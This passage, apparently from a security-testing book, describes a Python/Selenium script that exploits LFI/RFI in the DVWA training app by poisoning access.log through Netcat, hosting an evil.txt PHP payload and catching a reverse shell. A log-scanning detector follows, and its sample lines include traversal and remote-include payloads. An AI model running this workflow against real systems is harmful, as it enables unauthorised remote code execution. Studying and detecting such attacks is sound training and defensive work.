LFI/RFI exploit code

Let's take a look at the following code that will exploit LFI/RFI vulnerabilities in DVWA:

In the following code snippet, lines 65-74 check whether the application to be tested requires authentication for the vulnerability to be exploited:

If authentication is required, then the cookie values supplied by the user are set on the Selenium Python browser driver, and the URL is invoked with that cookie data so that the browser has a valid session:

The lines between 90 and 105 control the LFI vulnerability workflow. This section automates the sequence of steps that we performed manually. In line 91, we prepare the malicious URL that will poison the log file and place a PHP code snippet in the access.log file. In line 93, we write that malicious URL to a text file called exp.txt and ask Netcat to take its input from that file. Remember that we used Netcat when we poisoned the access.log file previously; the same operation is repeated here. In line 97, we ask Netcat to connect to the victim server on port 80, take its input from the exp.txt file, and send that input to the victim server, so that the log gets poisoned. We do this by creating a bash script, exp.sh. In line 99, we invoke this bash script, which in turn invokes Netcat and causes it to take its input from the evil.txt file, thereby poisoning the log. In line 103, we set up the exploit URL, the one that our simulated Selenium browser will visit, so that it gives us a reverse shell:

In line 115, we create a process that will cause the browser to request the vulnerable page with the payload, and we start it with the process's start() method in line 116. But before actually triggering the exploit, we need a Netcat listener in place. Line 119 sets up the Netcat listener, and the definition of the process method send_exp() introduces a time delay of five seconds, giving Netcat time to start. Once it has started, the payload is delivered by the send_exp() method defined at line 61. If everything goes well, our listener gets the shell.

Lines 107-113 handle the RFI part of the vulnerability. To exploit the RFI, we need an evil file, evil.txt, created on our attacker machine, which will deliver the PHP payload. Once created, we place it in /var/www/html/evil.txt. Then we start the Apache server and update the payload delivery URL to the address used for the RFI. Finally, with the send_exp() method, we deliver our payload and then start the Netcat listener.

The preceding code works for both LFI and RFI vulnerabilities. The script takes the user parameters in the following order:

python LFI_RFI.py <target ip> <target Base/Login URL> <target Vulnerable URL> <Target Vul parameter> <Login required (1/0)> <Login cookies> <Attacker IP> <Attacker Listener PORT> <Add params required (1/0)> <add_param_name1=add_param_value1,add_param_name2=add_param_value2> | <LFI (0/1)>
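Both stages of the workflow above, first a PHP tag being written into access.log by a crafted request and then the vulnerable parameter including that log (LFI) or a remote file (RFI), leave distinct traces in the web server's own access log. The following detector is an added example, not code from the book or from DVWA: the log lines are constructed, and the parameter name `page`, the rule names and the wrapper list are my assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample Apache combined-log lines (synthetic; not from the page or a live server).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /<?php echo 'marker'; ?> HTTP/1.1" 404 210 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:56:07 +0000] "GET /dvwa/vulnerabilities/fi/?page=../../../../var/log/apache2/access.log HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:57:20 +0000] "GET /dvwa/vulnerabilities/fi/?page=http://198.51.100.7/evil.txt HTTP/1.1" 200 330 "-" "Mozilla/5.0"
"""

# Combined log format: client ip, identd, user, [time], "request", status, size, "referer", "user-agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) \S+ "([^"]*)" "([^"]*)"')
PHP_TAG_RE = re.compile(r"<\?(?:php|=)", re.IGNORECASE)  # a PHP open tag ending up in the log
REMOTE_RE = re.compile(r"^(?:https?|ftp|php|data|expect):", re.IGNORECASE)  # remote URL or PHP wrapper (assumed list)

def parse_line(line):
    """Split one combined-format line into its fields; return None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _time, request, _status, referer, ua = m.groups()
    parts = request.split(" ")
    target = parts[1] if len(parts) >= 2 else ""
    return {"ip": ip, "request": request, "target": target, "referer": referer, "ua": ua}

def classify(entry, include_params):
    """Return human-readable findings for one parsed entry (empty list if nothing is suspicious)."""
    findings = []
    # Stage 1: a PHP tag smuggled into access.log through any field Apache logs verbatim.
    if any(PHP_TAG_RE.search(f) for f in (entry["request"], entry["referer"], entry["ua"])):
        findings.append("log-poisoning: PHP tag in logged request field")
    # Stage 2: the include parameter pulling in a log file (LFI) or a remote file (RFI).
    query = parse_qs(urlsplit(entry["target"]).query, keep_blank_values=True)
    for name in include_params:
        for value in query.get(name, []):
            if REMOTE_RE.match(value):
                findings.append(f"rfi: {name} points to a remote/wrapper URL")
            elif "../" in value or value.startswith("/"):
                kind = "lfi-log-include" if value.endswith(".log") or "/log/" in value else "lfi-traversal"
                findings.append(f"{kind}: {name}={value}")
    return findings

def scan_log(text, include_params=("page",)):
    """Scan a whole log and return (client ip, finding) pairs in log order."""
    alerts = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is not None:
            alerts.extend((entry["ip"], f) for f in classify(entry, include_params))
    return alerts
```

Pass the name of the include parameter your application actually uses as `include_params`; the three alerts on the same client address in quick succession are the pattern worth correlating on.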